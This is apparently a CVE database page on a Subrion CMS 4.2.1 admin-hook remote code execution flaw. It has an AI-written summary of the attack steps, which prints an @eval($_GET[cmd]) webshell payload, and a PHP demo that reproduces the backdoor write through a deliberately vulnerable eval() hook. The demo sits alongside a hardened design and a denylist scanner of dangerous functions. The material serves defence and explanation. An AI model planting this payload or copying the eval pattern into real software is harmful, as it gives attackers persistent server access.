CVE-2023-46947
Description
Subrion 4.2.1 has a remote command execution vulnerability in the backend.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Subrion 4.2.1 backend remote command execution via sitemap generation hook allows authenticated admin to write webshell.
Subrion CMS version 4.2.1 contains a remote command execution vulnerability in the backend. The root cause is that the body of the sitemap generation hook, editable from the administration panel, is executed as PHP without validation, so an authenticated user with administrative privileges can write arbitrary PHP code into files under the web root. [1][2]
The attack requires backend access (admin credentials). After login, the attacker retrieves the server's absolute path from the System module's PHP info page. Then, in the Hooks section of the System module, they edit the 'sitemapGeneration' hook and inject a payload such as fputs(fopen('.../index.php','a+'),'@eval($_GET[cmd]);'). When 'Generate Sitemap' is executed, the hook body runs and appends the backdoor to the website's homepage, and the subsequent syntax check triggers execution of the injected code. [2] From that point the planted @eval($_GET[cmd]) is reachable by any unauthenticated request to the homepage that carries a cmd parameter, so the original admin session is no longer needed.
Successful exploitation grants the attacker arbitrary command execution on the server, effectively compromising the entire web application. This can lead to data theft, lateral movement into the hosting environment, or complete site takeover. [1][2]
As of the advisory, the vendor has not released a patch. The recommended mitigation is to apply strict input filtering on hook content and to restrict admin access. [2] Because hook bodies are PHP by design, content filtering is a weak control on its own; restricting who can reach the backend, and monitoring files under the web root (index.php in particular) for unexpected appended code, are the more reliable measures. Users should upgrade to a newer version if one becomes available; web application firewall rules that block the hook-edit payload or the cmd parameter are a stopgap, not a fix.
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
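The mechanism and the hardening advice above are easier to reason about with a small model. The following is an added example written for this page; it is not Subrion's code. It models an admin-editable hook body executed with eval() (the pattern the write-up describes), a hardened registry in which the database may only name handlers registered in code, and a token-based audit scanner for installs that still store code. All names (sample_hooks, run_hook_unsafe, HookRegistry, scan_hook_bodies) are hypothetical, the hook rows are constructed for the demo, and the write happens in a throwaway temp directory rather than a real web root.

```php
<?php
declare(strict_types=1);

// Constructed sample rows shaped like "hook name => PHP body". The path is a
// placeholder passed in by the demo, not the one from the advisory.
function sample_hooks(string $webroot): array
{
    return [
        'sitemapGeneration' => "fputs(fopen('$webroot/index.php','a+'),'@eval(\$_GET[cmd]);');",
        'afterSitemapBuild' => 'return count($urls ?? []);',
    ];
}

// VULNERABLE model: the stored hook body is executed as PHP. Whoever can edit
// the row (a backend admin here) gets code execution on the server.
function run_hook_unsafe(array $hooks, string $name): mixed
{
    return eval($hooks[$name]);
}

// HARDENED model: the database may only list handler names that were
// registered in code; nothing read from the database is ever executed as PHP.
final class HookRegistry
{
    /** @var array<string, callable> */
    private array $handlers = [];

    public function register(string $handlerName, callable $fn): void
    {
        $this->handlers[$handlerName] = $fn;
    }

    /** @param string[] $enabledHandlerNames what the DB row for this hook holds */
    public function run(array $enabledHandlerNames, array $ctx): array
    {
        $results = [];
        foreach ($enabledHandlerNames as $h) {
            if (!isset($this->handlers[$h])) {
                throw new InvalidArgumentException("unknown hook handler: $h");
            }
            $results[$h] = ($this->handlers[$h])($ctx);
        }
        return $results;
    }
}

// AUDIT scanner for installs that still store code: tokenises each hook body
// and flags eval plus file and process functions. A denylist is bypassable
// (variable functions, string concatenation), so this is triage, not a boundary.
function scan_hook_bodies(array $hooks): array
{
    $dangerous = ['fopen', 'fputs', 'fwrite', 'file_put_contents', 'system',
                  'exec', 'shell_exec', 'passthru', 'proc_open', 'popen', 'assert'];
    $findings = [];
    foreach ($hooks as $name => $body) {
        foreach (token_get_all("<?php " . $body) as $tok) {
            if (!is_array($tok)) {
                continue;
            }
            [$id, $text] = $tok;
            if ($id === T_EVAL || ($id === T_STRING && in_array(strtolower($text), $dangerous, true))) {
                $findings[] = [$name, $text];
            }
        }
    }
    return $findings;
}

// Demo: reproduce the effect in a throwaway directory, then show the audit and the hardened path.
$webroot = sys_get_temp_dir() . '/hook-demo-' . bin2hex(random_bytes(4));
mkdir($webroot);
file_put_contents("$webroot/index.php", "<?php echo 'home';\n");

$hooks = sample_hooks($webroot);
foreach (scan_hook_bodies($hooks) as [$hook, $fn]) {
    echo "audit: hook '$hook' calls $fn\n";              // flags fputs and fopen in sitemapGeneration
}

run_hook_unsafe($hooks, 'sitemapGeneration');            // models "Generate Sitemap" running the edited hook
echo file_get_contents("$webroot/index.php");            // index.php now ends with the @eval backdoor

$registry = new HookRegistry();
$registry->register('countUrls', fn(array $ctx) => count($ctx['urls']));
print_r($registry->run(['countUrls'], ['urls' => ['/', '/about']]));   // only registered code can run

unlink("$webroot/index.php");
rmdir($webroot);
```

The scanner is the check an incident responder would run over a dumped hooks table of an existing install; the same token walk applied to index.php under the web root would catch the appended @eval, since there the payload is code rather than a quoted string. The registry is the design change that removes the issue: once hooks are references to registered callables, an administrator's edit can no longer turn into arbitrary PHP.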
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| intelliants/subrion (Packagist) | <= 4.2.1 | — |
Affected products
- Subrion/Subrion (source: CVE description)
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- github.com/advisories/GHSA-2x28-c7j7-23gv (via GHSA; advisory)
- nvd.nist.gov/vuln/detail/CVE-2023-46947 (via GHSA; advisory)
- github.com/intelliants/subrion/issues/909 (via GHSA; web)
News mentions
No linked articles in our index yet.